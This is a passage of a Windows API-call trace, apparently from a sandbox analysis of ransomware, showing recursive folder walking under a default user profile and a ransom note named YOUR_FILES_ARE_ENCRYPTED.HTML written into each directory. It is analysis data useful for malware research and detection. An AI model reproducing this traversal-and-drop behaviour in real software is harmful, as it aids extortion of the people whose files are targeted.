ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="08_Video_rated_at_4_or_5_stars.wpl", cAlternateFileName="08_VID~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0170.541] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.541] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0170.541] lstrlenW (lpString=".wpl") returned 4 [0170.541] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x0, dwReserved1=0x60, cFileName="09_Music_played_the_most.wpl", cAlternateFileName="09_MUS~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\09_Music_played_the_most.wpl") returned 116 [0170.541] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.541] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0170.541] lstrlenW (lpString=".wpl") returned 4 [0170.541] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb97380, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb97380, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x0, dwReserved1=0x60, cFileName="10_All_Music.wpl", cAlternateFileName="10_ALL~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\10_All_Music.wpl") returned 104 [0170.541] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.542] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0170.542] lstrlenW (lpString=".wpl") returned 4 [0170.542] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0170.542] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb97380, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb97380, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x60, cFileName="11_All_Pictures.wpl", cAlternateFileName="11_ALL~1.WPL")) returned 1 [0170.542] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\11_All_Pictures.wpl") returned 107 [0170.542] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.542] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0170.542] lstrlenW (lpString=".wpl") returned 4 [0170.542] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0170.542] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb97380, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb97380, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 1 [0170.542] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\12_All_Video.wpl") returned 104 [0170.542] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.542] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0170.542] lstrlenW (lpString=".wpl") returned 4 [0170.542] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0170.542] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb97380, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb97380, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 0 [0170.542] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0170.544] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000fdbe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0170.546] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0170.548] CloseHandle (hObject=0x5b8) returned 1 [0170.548] GetProcessHeap () returned 0x270000 [0170.549] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78c1008 | out: hHeap=0x270000) returned 1 [0170.549] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="0000FDBE", cAlternateFileName="")) returned 0 [0170.549] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0170.549] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0170.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0170.549] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0170.551] CloseHandle (hObject=0x5a4) returned 1 [0170.552] GetProcessHeap () returned 0x270000 [0170.552] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.559] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0170.559] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.559] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0170.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0170.560] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.562] CloseHandle (hObject=0x5b0) returned 1 [0170.562] GetProcessHeap () returned 0x270000 [0170.563] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.564] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 0 [0170.564] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.564] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0170.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.564] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.566] CloseHandle (hObject=0x5fc) returned 1 [0170.566] GetProcessHeap () returned 0x270000 [0170.567] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0170.568] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd7997eba, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows", cAlternateFileName="")) returned 1 [0170.568] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb42f5838, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0170.568] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail") returned 57 [0170.568] GetProcessHeap () returned 0x270000 [0170.568] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.569] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail" [0170.569] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*" [0170.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb42f5838, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.690] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb42f5838, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.690] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb4b0c0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859b5889, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", cAlternateFileName="ACCOUN~3.OEA")) returned 1 [0170.690] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned 113 [0170.690] lstrcmpW (lpString1="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.690] PathFindExtensionW (pszPath="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned=".oeaccount" [0170.690] lstrlenW (lpString=".oeaccount") returned 10 [0170.690] PathFindExtensionW (pszPath="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned=".oeaccount" [0170.691] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb4b0c0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859b5889, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", cAlternateFileName="ACCOUN~2.OEA")) returned 1 [0170.691] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned 113 [0170.691] lstrcmpW (lpString1="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.691] PathFindExtensionW (pszPath="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned=".oeaccount" [0170.691] lstrlenW (lpString=".oeaccount") returned 10 [0170.691] PathFindExtensionW (pszPath="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned=".oeaccount" [0170.691] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb4b0c0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x858aaee7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", cAlternateFileName="ACCOUN~1.OEA")) returned 1 [0170.691] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned 113 [0170.691] lstrcmpW (lpString1="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.691] PathFindExtensionW (pszPath="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned=".oeaccount" [0170.691] lstrlenW (lpString=".oeaccount") returned 10 [0170.691] PathFindExtensionW (pszPath="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned=".oeaccount" [0170.691] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d5fe78, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Backup", cAlternateFileName="")) returned 1 [0170.691] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned 64 [0170.691] GetProcessHeap () returned 0x270000 [0170.691] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.692] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" [0170.692] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*" [0170.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d5fe78, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.693] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d5fe78, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.693] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="new", cAlternateFileName="")) returned 1 [0170.693] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new") returned 68 [0170.693] GetProcessHeap () returned 0x270000 [0170.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0170.693] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new" [0170.693] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*" [0170.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0170.693] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.693] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82c554d6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0170.693] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0170.693] lstrcmpW (lpString1="edb00001.log", 